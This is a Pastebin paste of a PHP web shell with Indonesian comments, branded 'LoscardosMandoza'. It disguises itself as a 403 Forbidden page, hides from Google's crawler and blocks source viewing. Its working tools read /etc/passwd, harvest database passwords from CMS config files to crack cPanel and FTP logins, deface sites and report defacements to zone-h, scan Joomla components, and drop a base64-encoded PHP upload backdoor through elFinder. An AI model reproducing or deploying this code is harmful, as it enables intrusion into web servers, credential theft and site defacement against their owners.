VanGans

Tool

May 11th, 2019
348
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.16 KB | None | 0 0
  1. <html>
  2. <head>
  3. <center>
  4. <script type='text/javascript'>
  5. //<![CDATA[
  6. shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="http://www.loscardosmandoza.cf"});
  7. //]]>
  8. </script>
  9. <script>var g=35,f=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF"),e=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS"),d="*",m=0.6,a=22,b=8,c=1,j=new Array(),k,l,x,n=new Array(),o=new Array(),p=new Array(),q=navigator.userAgent,r=document.all&&document.getElementById&&!q.match(/Opera/),s=document.getElementById&&!document.all,u=q.match(/Opera/),t=r||s||u;function y(z){return Math.floor(z*Math.random())}function v(){if(r||u){k=document.body.clientHeight;l=document.body.clientWidth;}else if(s){k=window.innerHeight;l=window.innerWidth;}var h=a-b;for(i=0;i<=g;i++){o[i]=0;p[i]=Math.random()*15;n[i]=0.03+Math.random()/10;j[i]=document.getElementById("s"+i);j[i].style.fontFamily=e[y(e.length)];j[i].size=y(h)+b;j[i].style.fontSize=j[i].size;j[i].style.color=f[y(f.length)];j[i].sink=m*j[i].size/5;if(c==1){j[i].posx=y(l-j[i].size)}if(c==2){j[i].posx=y(l/2-j[i].size)}if(c==3){j[i].posx=y(l/2-j[i].size)+l/4};if(c==4){j[i].posx=y(l/2-j[i].size)+l/2}j[i].posy=y(2*k-k-2*j[i].size);j[i].style.left=j[i].posx;j[i].style.top=j[i].posy}w()}function w(){for(i=0;i<=g;i++){o[i]+=n[i];j[i].posy+=j[i].sink;j[i].style.left=j[i].posx+p[i]*Math.sin(o[i]);j[i].style.top=j[i].posy;if(j[i].posy>=k-2*j[i].size||parseInt(j[i].style.left)>(l-3*p[i])){if(c==1){j[i].posx=y(l-j[i].size)}if(c==2){j[i].posx=y(l/2-j[i].size)}if(c==3){j[i].posx=y(l/2-j[i].size)+l/4}if(c==4){j[i].posx=y(l/2-j[i].size)+l/2}j[i].posy=0}}var x=setTimeout("w()",50)}for(i=0;i<=g;i++){document.write("<span id='s"+i+"' style='position:absolute;top:-"+a+"'>"+d+"</span>")}if(t){window.onload=v}</script><div style="position:absolute;left:36%;top:46%"></div><style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white}</textarea><br>
  10.  
  11.  
  12. </form>
  13. <style>
  14. body {
  15. background-color:#1D1B1B;
  16. background-image:url('http://www.userlogos.org/files/backgrounds/macleod.mac/Map1280x800.jpg');
  17. color:white;
  18. }
  19. /*Gak usah banyak bacod :D */
  20. #cat-nav {background:#156994;margin:0 15px;padding:0;height:35px;}
  21. #cat-nav a { color:#eee; text-decoration:none; text-shadow: #033148 0px 1px 0px;border-right:1px solid #156994;}
  22. #cat-nav a:hover { color:#fff; }
  23. #cat-nav li:hover { background:#000; }
  24. #cat-nav a span { font-family:Verdana, Geneva, sans-serif; font-size:11px; font-style:normal; font-weight:400; color:#fff; text-shadow:none;}
  25. #cat-nav .nav-description { display:block; }
  26. #cat-nav a:hover span { color:#fff; }
  27. #secnav, #secnav ul { position:relative; z-index:100; margin:0; padding:0; list-style:none; line-height:1; background:#0d5e88; }
  28. #secnav a { font-family:Georgia, "Times New Roman", Times, serif; font-style:italic; font-weight:700; font-size:14px; display:block; z-index:100; padding:0 15px; line-height:35px; text-decoration:none;}
  29. #secnav li { float:left; width: auto; height:35px;}
  30. #secnav li ul { position: absolute; left: -999em; width: 200px; top:35px}
  31. #secnav li ul li { height:30px; border-top:1px solid #fff; }
  32. #secnav li ul li a { font-family:Verdana, Geneva, sans-serif; width:180px; line-height:30px; padding:0 10px; font-size:11px; font-style:normal; font-weight:400; color:#eee; }
  33. #secnav li ul ul { margin: -30px 0 0 180px; }
  34. #secnav li:hover ul ul, #secnav li:hover ul ul ul, #secnav li.sfhover ul ul, #secnav li.sfhover ul ul ul { left:-999em; }
  35. #secnav li:hover ul, #secnav li li:hover ul, #secnav li li li:hover ul, #secnav li.sfhover ul, #secnav li li.sfhover ul, #secnav li li li.sfhover ul { left: auto; }
  36. #secnav li:hover,#secnav li.hover { position:static; }
  37. #cat-nav #secnav {width:100%;margin:0 auto;}
  38. </style>
  39. <?php
  40. $color = "#00ff00";
  41. $default_action = 'FilesMan';
  42. @define('SELF_PATH', __FILE__);
  43. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  44. header('HTTP/1.0 404 Not Found');
  45. exit;
  46. }
  47. @session_start();
  48. @error_reporting(0);
  49. @ini_set('error_log',NULL);
  50. @ini_set('log_errors',0);
  51. @ini_set('max_execution_time',0);
  52. @ini_set('output_buffering',0);
  53. @ini_set('display_errors', 0);
  54. @set_time_limit(0);
  55. @set_magic_quotes_runtime(0);
  56. @define('VERSION', '2.1');
  57. if( get_magic_quotes_gpc() ) {
  58. function stripslashes_array($array) {
  59. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  60. }
  61. $_POST = stripslashes_array($_POST);
  62. }
  63. function printLogin() {
  64. ?>
  65. echo"
  66. <title> Forbidden</title>
  67. </head><body>
  68. <div id='forbid'>
  69. <h1>Forbidden</h1>
  70.  
  71. <p>You don't have permission to access URL on this server.<br>
  72. Server unable to read htaccess file, denying access to be safe
  73. <br><br>
  74. Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></div>";
  75.  
  76. if($_GET['login']=='3RR0R'){
  77.  
  78. echo'
  79. <style>
  80. body{
  81. background:#000;
  82. backgroud-size:100%;
  83. }
  84. input{
  85. text-align:center;
  86. border-top:3px solid blue;
  87. border-left:3px solid blue;
  88. border-bottom:3px solid #fff;
  89. border-right:3px solid #fff;
  90. background:transparent;
  91. color:#333;
  92. }
  93. input:hover{
  94. transition-duration:0.5s;
  95. -o-transition-duration:0.5s;
  96. -moz-transition-duration:0.5s;
  97. -webkit-transition-duration:0.5s;
  98. border-style:dashed;
  99. cursor:pointer;
  100. }
  101. #forbid{
  102. display:none;
  103. }
  104. table{
  105. margin-top:25px;
  106. }
  107.  
  108. <?php
  109. exit;
  110. }
  111. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  112. if( empty( $auth_pass ) ||
  113. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  114. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  115. else
  116. printLogin();
  117. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  118. @ob_clean();
  119. $file = $_GET['file'];
  120. header('Content-Description: File Transfer');
  121. header('Content-Type: application/octet-stream');
  122. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  123. header('Expires: 0');
  124. header('Cache-Control: must-revalidate');
  125. header('Pragma: public');
  126. header('Content-Length: ' . filesize($file));
  127. readfile($file);
  128. exit;
  129. }
  130. ?>
  131. <html>
  132. <head>
  133. <title>LoscardosMandoza</title>
  134.  
  135. </style>
  136. </head>
  137. <table width="200" border="0" cellpadding="3" cellspacing="1" align="center">
  138. <?php
  139. echo "$cdir</a>";
  140. echo "<hr>";
  141. echo "<center>";
  142. echo "<ul>";
  143. echo "<li>";
  144. echo "<div id='cat-nav'>";
  145. echo "<ul class='fl' id='secnav'>";
  146. echo "<li><a href='?'>Home</a>";
  147. echo "<li><a href='#'>Exploit</a>";
  148. echo "<ul id='sub-custom-nav'>";
  149. echo "<li><a href='?dir=$dir&xai=hashid'>Hash ID</a>";
  150. echo "<li><a href='?dir=$dir&xai=bing'>Bing Grabber</a>";
  151. echo "<li><a href='?dir=$dir&xai=ende'>Encode Decode</a>";
  152. echo "<li><a href='?dir=$dir&xai=sqli'>Sqli Scanner</a>]";
  153. echo "<li><a href='?dir=$dir&xai=tvon'>Tevolution Auto Exploit</a>";
  154. echo "<li><a href='?dir=$dir&xai=wpbf'>WP Brute Force</a>";
  155. echo "<li><a href='?dir=$dir&xai=pretashopa'>Pretashopa Exploiter</a>";
  156. echo "<li><a href='?dir=$dir&xai=csrfup'>CSRF Exploiter</a>]";
  157. echo "<li><a href='?dir=$dir&xai=lokomedia'>Lokmedia Auto Exploit</a>";
  158. echo "<li><a href='?dir=$dir&xai=mirrorh'>Mirrorh</a> ";
  159. echo "<li><a href='?dir=$dir&xai=bfmc'>Brute Force Magento</a>";
  160. echo "<li><a href='?dir=$dir&xai=dbdm'>DataBase Dumb</a>";
  161. echo "</ul>";
  162. echo "</li>";
  163. echo "<li><a href='#'>Exploit2</a>";
  164. echo "<ul id='sub-custom-nav'>";
  165. echo "<li><a href='?dir=$dir&xai=ddos'>DDOS Online</a>";
  166. echo "<li><a href='?dir=$dir&xai=jquery'>Jquery Auto Exploit</a>";
  167. echo "<li><a href='?dir=$dir&xai=whois'>Whois</a>";
  168. echo "<li><a href='?dir=$dir&xai=drupal'>Drupal Auto Exploit</a>";
  169. echo "<li><a href='?dir=$dir&xai=tools'>Tools</a>]";
  170. echo "<li><a href='?dir=$dir&xai=wevdav'>Webdav Auto Deface</a>";
  171. echo "<li><a href='?dir=$dir&xai=joomscan'>Joomla Scan</a>";
  172. echo "<li><a href='?dir=$dir&xai=zoneh'>Zone-H</a>";
  173. echo "<li><a href='?dir=$dir&xai=defacerid'>Defacer.ID</a>";
  174. echo "<li><a href='?dir=$dir&xai=elfinder'>Elfinder Auto Exploit</a>";
  175. echo "<li><a href='?dir=$dir&xai=popoji'>Popoji Auto Register</a> ";
  176. echo "<li><a href='?dir=$dir&xai=twitter'>Brute Force Twitter</a>";
  177. echo "<li><a href='?dir=$dir&xai=admf'>Admin Finder</a>";
  178. echo "<li><a href='?dir=$dir&xai=ports'>Ports Scanner</a>";
  179. echo "</li>";
  180. echo "</ul>";
  181. echo "<li><a href='?dir=$dir&xai=contac'>Contact Me</a>";
  182. echo "</li>";
  183. echo "<li><a href='?dir=$dir&xai=blog'>BlogSpot</a>";
  184. echo "</li>";
  185. echo "</center>";
  186. echo "</hr>";
  187. if($_GET['xai'] == 'cpftp_auto') {
  188. echo "<center>";
  189. if($_POST['crack']) {
  190. $usercp = explode("\r\n", $_POST['user_cp']);
  191. $passcp = explode("\r\n", $_POST['pass_cp']);
  192. $i = 0;
  193. foreach($usercp as $ucp) {
  194. foreach($passcp as $pcp) {
  195. if(@mysql_connect('localhost', $ucp, $pcp)) {
  196. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  197. } else {
  198. $_SESSION[$ucp] = "1";
  199. $_SESSION[$pcp] = "1";
  200. if($ucp == '' || $pcp == '') {
  201. //
  202. } else {
  203. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  204. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  205. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  206. if((!$ftp_login) || (!$ftp_conn)) {
  207. echo "[+] <font color=red>Login Gagal</font><br><br>";
  208. } else {
  209. echo "[+] <font color=lime>Login Sukses</font><br>";
  210. $fi = htmlspecialchars($_POST['file_deface']);
  211. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  212. if($deface) {
  213. $i++;
  214. echo "[+] <font color=lime>Deface Sukses</font><br>";
  215. if(function_exists('posix_getpwuid')) {
  216. $domain_cp = file_get_contents("/etc/named.conf");
  217. if($domain_cp == '') {
  218. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  219. } else {
  220. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  221. foreach($domains_cp[1] as $dj) {
  222. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  223. $user_cp_url = $user_cp_url['name'];
  224. if($user_cp_url == $ucp) {
  225. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  226. break;
  227. }
  228. }
  229. }
  230. } else {
  231. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  232. }
  233. } else {
  234. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  235. }
  236. }
  237. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  238. }
  239. }
  240. }
  241. }
  242. }
  243. if($i == 0) {
  244. } else {
  245. echo "<br>sukses deface ".$i." Cpanel <font color=lime>.</font>";
  246. }
  247. } else {
  248. echo "<center>
  249. <form method='post'>
  250. Filename: <br>
  251. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  252. Deface Page: <br>
  253. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  254. USER: <br>
  255. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  256. $_usercp = fopen("/etc/passwd","r");
  257. while($getu = fgets($_usercp)) {
  258. if($getu == '' || !$_usercp) {
  259. echo "<font color=red>Can't read /etc/passwd</font>";
  260. } else {
  261. preg_match_all("/(.*?):x:/", $getu, $u);
  262. foreach($u[1] as $user_cp) {
  263. if(is_dir("/home/$user_cp/public_html")) {
  264. echo "$user_cp\n";
  265. }
  266. }
  267. }
  268. }
  269. echo "</textarea><br>
  270. PASS: <br>
  271. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  272. function cp_pass($dir) {
  273. $pass = "";
  274. $dira = scandir($dir);
  275. foreach($dira as $dirb) {
  276. if(!is_file("$dir/$dirb")) continue;
  277. $ambil = file_get_contents("$dir/$dirb");
  278. if(preg_match("/WordPress/", $ambil)) {
  279. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  280. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  281. $pass .= ambilkata($ambil,"password = '","'")."\n";
  282. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  283. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  284. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  285. $pass .= ambilkata($ambil,'password = "','"')."\n";
  286. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  287. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  288. } elseif(preg_match("/client/", $ambil)) {
  289. preg_match("/password=(.*)/", $ambil, $pass1);
  290. if(preg_match('/"/', $pass1[1])) {
  291. $pass1[1] = str_replace('"', "", $pass1[1]);
  292. $pass .= $pass1[1]."\n";
  293. }
  294. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  295. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  296. }
  297. }
  298. echo $pass;
  299. }
  300. $cp_pass = cp_pass($dir);
  301. echo $cp_pass;
  302. echo "</textarea><br>
  303. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  304. </form>
  305. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  306. }
  307. }elseif($_GET['xai'] == 'defacerid') {
  308. echo "<center><form method='post'>
  309. <u>Defacer</u>: <br>
  310. <input type='text' name='hekel' size='50' value='Fuck'><br>
  311. <u>Team</u>: <br>
  312. <input type='text' name='tim' size='50' value='XaiSyndicate'><br>
  313. <u>Domains</u>: <br>
  314. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  315. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  316. </form>";
  317. $site = explode("\r\n", $_POST['sites']);
  318. $go = $_POST['go'];
  319. $hekel = $_POST['hekel'];
  320. $tim = $_POST['tim'];
  321. if($go) {
  322. foreach($site as $sites) {
  323. $zh = $sites;
  324. $form_url = "https://www.defacer.id/notify";
  325. $data_to_post = array();
  326. $data_to_post['attacker'] = "$hekel";
  327. $data_to_post['team'] = "$tim";
  328. $data_to_post['poc'] = 'SQL Injection';
  329. $data_to_post['url'] = "$zh";
  330. $curl = curl_init();
  331. curl_setopt($curl,CURLOPT_URL, $form_url);
  332. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  333. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  334. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  335. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  336. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  337. $result = curl_exec($curl);
  338. echo $result;
  339. curl_close($curl);
  340. echo "<br>";
  341. }
  342. }
  343. } elseif($_GET['xai'] == 'zoneh') {
  344. if($_POST['submit']) {
  345. $domain = explode("\r\n", $_POST['url']);
  346. $nick = $_POST['nick'];
  347. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  348. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  349. function zoneh($url,$nick) {
  350. $ch = curl_init("http://www.zone-h.com/notify/single");
  351. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  352. curl_setopt($ch, CURLOPT_POST, true);
  353. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  354. return curl_exec($ch);
  355. curl_close($ch);
  356. }
  357. foreach($domain as $url) {
  358. $zoneh = zoneh($url,$nick);
  359. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  360. echo "$url -> <font color=lime>OK</font><br>";
  361. } else {
  362. echo "$url -> <font color=red>ERROR</font><br>";
  363. }
  364. }
  365. } else {
  366. echo "<center><form method='post'>
  367. <u>Defacer</u>: <br>
  368. <input type='text' name='nick' size='50' value='XaiSyndicate'><br>
  369. <u>Domains</u>: <br>
  370. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  371. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  372. </form>";
  373. }
  374. echo "</center>";
  375.  
  376. } elseif($_GET['xai'] == 'adminer') {
  377. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  378. function adminer($url, $isi) {
  379. $fp = fopen($isi, "w");
  380. $ch = curl_init();
  381. curl_setopt($ch, CURLOPT_URL, $url);
  382. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  383. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  384. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  385. curl_setopt($ch, CURLOPT_FILE, $fp);
  386. return curl_exec($ch);
  387. curl_close($ch);
  388. fclose($fp);
  389. ob_flush();
  390. flush();
  391. }
  392. if(file_exists('adminer.php')) {
  393. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  394. } else {
  395. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  396. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  397. } else {
  398. echo "<center><font color=red>gagal buat file adminer</font></center>";
  399. }
  400. }
  401. } elseif($_GET['xai'] == 'joomscan') {
  402. {
  403. ?>
  404. <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
  405. <?php
  406. echo '
  407.  
  408. <br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
  409. <form method="POST">
  410. <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
  411. </form><center>
  412.  
  413. ';
  414. @set_time_limit(0);
  415. @error_reporting(E_ALL | E_NOTICE);
  416.  
  417. function check_exploit($comxx){
  418.  
  419. $link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  420.  
  421. $result = @file_get_contents($link);
  422.  
  423. if (eregi("No results",$result)) {
  424.  
  425. echo"<td>Not Found</td><td><a href='http://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>";
  426.  
  427. }else{
  428.  
  429. echo"<td><a href='$link'>Found</a></td><td><=</td></tr>";
  430.  
  431. }
  432. }
  433.  
  434. function check_com($url){
  435.  
  436. $source = @file_get_contents($url);
  437.  
  438. preg_match_all('{option,(.*?)/}i',$source,$f);
  439. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  440. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  441.  
  442. $arz=array_merge($f2[1],$f[1],$f3[1]);
  443.  
  444. $coms=array();
  445.  
  446. foreach(array_unique($arz) as $x){
  447. $coms[]=$x;
  448. }
  449.  
  450. foreach($coms as $comm){
  451.  
  452. echo "<tr><td>$comm</td>";
  453. check_exploit($comm);
  454. }
  455.  
  456. }
  457.  
  458. function sec($site){
  459. preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
  460. if(eregi("www",$sites[0][0])){
  461. return $site=str_replace("index.php","",$sites[0][0]);
  462. }else{
  463. return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
  464. }}
  465.  
  466. $npages = 50000;
  467.  
  468. if ($_POST)
  469. {
  470. $ip = trim(strip_tags($_POST['site']));
  471. $npage = 1;
  472. $allLinks = array();
  473.  
  474.  
  475. while($npage <= $npages)
  476. {
  477.  
  478. $x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
  479.  
  480.  
  481. if ($x)
  482. {
  483. preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink);
  484.  
  485. foreach ($findlink[1] as $fl)
  486.  
  487. $allLinks[]=sec($fl);
  488.  
  489.  
  490. $npage = $npage + 10;
  491.  
  492. if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0)
  493. break;
  494. }
  495.  
  496. else
  497. break;
  498. }
  499.  
  500.  
  501. $allDmns = array();
  502.  
  503. foreach ($allLinks as $kk => $vv){
  504.  
  505. $allDmns[] = $vv;
  506. }
  507.  
  508. echo'<table border="1" width=\"80%\" align=\"center\">
  509. <tr><td width=\"30%\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>
  510. <tr><td width=\"30%\"><b>Sites Found&nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
  511. </table>';
  512. echo "<br><br>";
  513.  
  514. echo'<table border="1" width="80%" align=\"center\">';
  515.  
  516. foreach(array_unique($allDmns) as $h3h3){
  517.  
  518. echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>';
  519.  
  520. check_com($h3h3);
  521.  
  522. }
  523.  
  524. echo"</table>";
  525.  
  526. }
  527. }
  528.  
  529. } elseif($_GET['xai'] == 'csrfup')
  530. {
  531. echo '<html>
  532. <center><h1 style="font-size:33px;">CSRF Exploiter Online</h1><br><br>
  533. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  534. <br><br>
  535. <form method="post" style="font-size:25px;">
  536. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  537. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  538. <input type="submit" name="d" value="Lock!">
  539. </form>';
  540. $url = $_POST["url"];
  541. $pf = $_POST["pf"];
  542. $d = $_POST["d"];
  543. if($d) {
  544. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  545. </html>";
  546. }
  547. } elseif($_GET['xai'] == 'elfinder') {
  548.  
  549. echo '<html>
  550. </style>
  551. <form method="post">
  552. Target: <br>
  553. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
  554. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
  555. <html style="margin: 2em auto; color: #008000; background: #000000;"></html>
  556. </form>
  557. </html>';}
  558. function ngirim($url, $isi) {
  559. $ch = curl_init ("$url");
  560. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  561. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  562. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  563. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  564. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  565. curl_setopt ($ch, CURLOPT_POST, 1);
  566. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  567. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  568. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  569. $data3 = curl_exec ($ch);
  570. return $data3;
  571. }
  572. $target = explode("\r\n", $_POST['target']);
  573. if($_POST['x']) {
  574. foreach($target as $korban) {
  575. $nama_doang = "k.php";
  576. $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  577. $decode_isi = base64_decode($isi_nama_doang);
  578. $encode = base64_encode($nama_doang);
  579. $fp = fopen($nama_doang,"w");
  580. fputs($fp, $decode_isi);
  581. echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  582. echo "# Upload[1] ......<br>";
  583. $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  584. $b = file_get_contents("$url_mkfile");
  585. $post1 = array(
  586. "cmd" => "put",
  587. "target" => "l1_$encode",
  588. "content" => "$decode_isi",
  589. );
  590. $post2 = array(
  591. "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  592. "upload[]" => "@$nama_doang",);
  593. $output_mkfile = ngirim("$korban", $post1);
  594. if(preg_match("/$nama_doang/", $output_mkfile)) {
  595. echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  596. } else {
